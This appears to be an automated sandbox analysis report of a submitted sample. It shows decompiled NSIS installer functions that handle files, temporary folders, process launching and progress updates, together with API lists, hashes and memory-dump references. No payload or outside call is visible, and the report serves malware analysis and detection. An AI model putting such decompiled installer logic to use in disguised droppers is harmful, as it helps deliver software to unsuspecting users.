
Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764

Uniqueness

Uniqueness Score: -1.00%

Function 00403C2B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403C2B() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C88();
				_t4 = E00405D7A(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsfF27F.tmp\\", 7); // executed
				return _t4;
			}

0x00403c2b
0x00403c3a
0x00403c3d
0x00403c3f
0x00403c3f
0x00403c46
0x00403c4e
0x00403c51
0x00403c53
0x00403c53
0x00403c53
0x00403c5a
0x00403c66
0x00403c6c

APIs

CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51

Strings

C:\Users\user\AppData\Local\Temp\nsfF27F.tmp\, xrefs: 00403C61
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsfF27F.tmp\
API String ID: 2962429428-3409902602
Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99

Uniqueness

Uniqueness Score: -1.00%

Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x7a8af8;
					 *0x79f734 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040347F(4);
				if(_t22 >= 0) {
					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x79f734 =  *0x79f734 + 4;
						_t36 = E0040347F(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x79f734 =  *0x79f734 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
											goto L18;
										}
										_t30 = E00406210(_a8, 0x793730, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x79f734 =  *0x79f734 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x0040337b
0x00403384
0x0040338d
0x00403391
0x0040339c
0x0040339c
0x004033a4
0x004033ab
0x004033bd
0x004033c4
0x00403469
0x00403469
0x00000000
0x004033ca
0x004033cd
0x004033d9
0x004033dd
0x00403477
0x00403477
0x004033e3
0x004033e6
0x00403445
0x0040344b
0x0040344d
0x0040344d
0x0040345f
0x00403467
0x0040346e
0x00403471
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e8
0x004033eb
0x00000000
0x004033f1
0x004033f6
0x004033fd
0x00403400
0x00403402
0x00403402
0x0040340f
0x00403419
0x00000000
0x00000000
0x00403422
0x00403429
0x00403441
0x0040346b
0x0040346b
0x0040342b
0x0040342b
0x0040342e
0x00403431
0x00403437
0x0040343d
0x00000000
0x0040343f
0x00000000
0x0040343f
0x0040343d
0x00000000
0x00403429
0x00000000
0x004033f6
0x004033eb
0x004033e6
0x004033dd
0x004033c4
0x00403479
0x0040347c

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C

Strings

07y, xrefs: 004033F1

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID: 07y
API String ID: 973152223-1660179758
Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F6A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C1C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B9F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-47812868
Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406139(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}

0x00405d33
0x00405d3e
0x00405d43
0x00405d73
0x00000000
0x00405d73
0x00405d4a
0x00405d4b
0x00405d55
0x00405d4d
0x00405d4d
0x00405d4d
0x00405d5d
0x00405d69
0x00405d6d
0x00405d6d
0x00000000
0x00405d5f
0x00000000
0x00405d61

APIs

Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152

RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406AE6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A77(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}

0x00406af7
0x00406b0e
0x00406b02
0x00406b0c
0x00406b0c
0x00406b19
0x00406b25

APIs

WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ObjectSingleWait$CodeExitProcess
String ID:
API String ID: 2567322000-0
Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00406045(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040666E(0x7a4790, _a4);
				_t21 = E00405FE8(0x7a4790);
				if(_t21 != 0) {
					E004068F5(_t21);
					if(( *0x7a8ab8 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4790 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4790);
							_push(0x7a4790);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004069A4();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F89(0x7a4790);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F3D();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00406051
0x0040605c
0x00406060
0x00406067
0x00406073
0x00406083
0x00406085
0x0040609d
0x0040609e
0x004060a5
0x004060a6
0x00000000
0x00000000
0x00406089
0x00406090
0x00406098
0x00000000
0x00000000
0x00000000
0x00000000
0x00406090
0x004060a8
0x004060ae
0x00000000
0x004060bc
0x00406075
0x0040607b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040607b
0x00406062
0x00000000

APIs

Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B

Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013

lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 0040609E
GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004060AE

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8ad0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a8c =  *0x7a7a8c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C51(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f90->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c5a
0x00405c7a
0x00405c82
0x00405c87
0x00000000
0x00405c8d
0x00405c91

APIs

CreateProcessW.KERNELBASE ref: 00405C7A
CloseHandle.KERNEL32(?), ref: 00405C87

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
